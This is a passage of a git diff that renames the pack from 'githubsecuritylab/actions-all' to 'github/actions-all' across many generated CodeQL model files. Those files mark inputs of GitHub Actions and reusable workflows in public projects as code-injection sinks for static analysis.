a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index 819728cf7187..7939469934e8 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index d3eaca780b40..1af5c9435afb 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index 42c00ea216b4..bcb9dc853d6d 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index a93d6a039d43..ec5b1a4e50c4 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index 8a7784a6f01e..2f0bb66127b4 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 1b22d43bfad8..65953f0387ab 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 7175dd9450b4..035e331a007f 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index dca0f00a4ec8..1cf431a75736 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index 5f75d4fd0cd2..669d7f443b13 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index d34a6a1a3885..b53f09499031 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index b7c5f7e214c1..4e9af4a1a8eb 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index eead3b5ace31..3fd31a3612fa 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index be7043cfdbfc..090bf1afc851 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index 36bdef9ad9ae..47afbc44f765 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 3d66b07df9f1..4e173c717e57 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 2f8a3fbdfa6f..8091471b3c03 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index e1acb54c7247..a3b3a5624c1e 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index 0a51c7087996..22264f3f29f9 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index 0ee56c05777d..e33a45e698ba 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index f17216cf1e8c..a2d5e1ef7a33 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index 551010c6634d..e0ae2bc70bdb 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index bd64e336c171..7926fa4e083e 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 7d5454518675..2369c82bcb7a 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index 1ad4a2b824df..d388b1a55b31 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index 60381d41f16b..dade6e8c958a 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index ac61ed797d52..9ac87054f10a 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index 7eed41f755ed..3f9f3f632070 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index f977f6a5cce1..aff068890ad4 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index c4bacdc9c2c7..0304e585bb6f 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index f4ee49207979..46950d380cbb 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index 5fae95e5defb..2e3c2530ebae 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index 4115d6c98f71..58f3d831423d 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index 536b37131c17..dfa20e1f9d74 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index 54f72118d870..144c4e456dc1 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index bed9ae53110e..51348fb1b565 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index 7e9f4e14e857..c3fa787b2887 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 3a16fc74bb68..9845c089b322 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 686f1013dd81..2986040e8cd6 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 6a6cb61c1745..7dafcd5b71bc 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 513cd4d76446..1b5fb0e1d970 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index 2855a6d4e01d..28ec54f1d9dd 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index 78a2cc4e0ced..21f35339952a 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index 8db73d2fc779..594b0cc9bb99 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index 8b0deda070d9..a2fbd510bb29 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 3f7a7e7fda80..927cbd449e35 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index 9746a1186913..52037a671cf1 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index 6208645b1b7b..b71a87193b68 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index e66e7326701e..24361a7d29eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index 471ce3a672a9..be71c38f1242 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 1af30be9f358..889edaac1bba 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index ee3d9d0a8eff..b2b970152de6 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index 493594e3b81a..f885a44f46e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index a437581ba83a..10f06693d26a 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: 